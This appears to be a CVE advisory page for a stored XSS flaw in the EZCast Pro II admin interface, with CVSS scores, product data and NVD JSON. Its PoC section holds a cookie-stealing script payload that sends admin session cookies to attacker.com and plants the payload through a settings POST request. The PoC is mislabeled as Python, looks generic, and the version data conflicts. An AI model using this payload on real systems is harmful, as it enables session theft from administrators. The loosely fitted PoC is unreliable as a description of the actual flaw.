Security Vulnerability Report
中文
CVE-2026-24348 CVSS 6.1 MEDIUM

CVE-2026-24348

Published: 2026-01-27 10:15:49
Last Modified: 2026-02-05 17:24:11
Source: [email protected]

Description

Multiple cross-site scripting vulnerabilities in Admin UI of EZCast Pro II version 1.17478.146 allow attackers to execute arbitrary JavaScript code in the browser of other Admin UI users.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:nimbletech:ezcast_pro_dongle_ii_firmware:1.17478.146:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nimbletech:ezcast_pro_dongle_ii:-:*:*:*:*:*:*:* - NOT VULNERABLE
EZCast Pro II < 1.17478.146

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-24348 Stored XSS PoC for EZCast Pro II Admin UI // Target: EZCast Pro II version 1.17478.146 Admin Management Interface // Inject malicious JavaScript via vulnerable input field in Admin UI // This PoC demonstrates the XSS payload execution const xssPayload = '<script>\n' + ' // Steal admin session cookies ' + ' var stolenCookies = document.cookie; ' + ' ' + ' // Send stolen data to attacker-controlled server ' + ' fetch("https://attacker.com/collect?data=" + encodeURIComponent(stolenCookies), { ' + ' method: "GET", ' + ' mode: "no-cors" ' + ' }); ' + ' ' + ' // Alternative payload: DOM-based cookie theft ' + ' document.write("<img src=x onerror=\'" ' + ' + "fetch(\"https://attacker.com/steal?cookie=" + document.cookie + "\")" ' + ' + "\' />"); ' + '</script>'; // HTTP Request to inject payload (example POST request) const httpRequest = `POST /admin/settings HTTP/1.1 Host: target-ezcast-pro.local Content-Type: application/x-www-form-urlencoded Cookie: admin_session=xxxxx device_name=${encodeURIComponent(xssPayload)}&submit=Save`; console.log("XSS Payload Injected:"); console.log(xssPayload); console.log("\nWhen admin visits the affected page, the script will execute in their browser context.");

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24348", "sourceIdentifier": "[email protected]", "published": "2026-01-27T10:15:49.360", "lastModified": "2026-02-05T17:24:11.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple cross-site scripting vulnerabilities in Admin UI of EZCast Pro II version 1.17478.146 allow attackers to execute arbitrary JavaScript code in the browser of other Admin UI users."}, {"lang": "es", "value": "Múltiples vulnerabilidades de cross-site scripting en la Admin UI de EZCast Pro II versión 1.17478.146 permiten a los atacantes ejecutar código JavaScript arbitrario en el navegador de otros usuarios de la Admin UI."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "USER", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nimbletech:ezcast_pro_dongle_ii_firmware:1.17478.146:*:*:*:*:*:*:*", "matchCriteriaId": "D9C1B80A-D748-40B9-B2FB-476107B3D705"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nimbletech:ezcast_pro_dongle_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "0621F0E0-6ABB-46E2-8E85-22C8695ACE87"}]}]}], "references": [{"url": "https://hub.ntc.swiss/ntcf-2025-145332", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.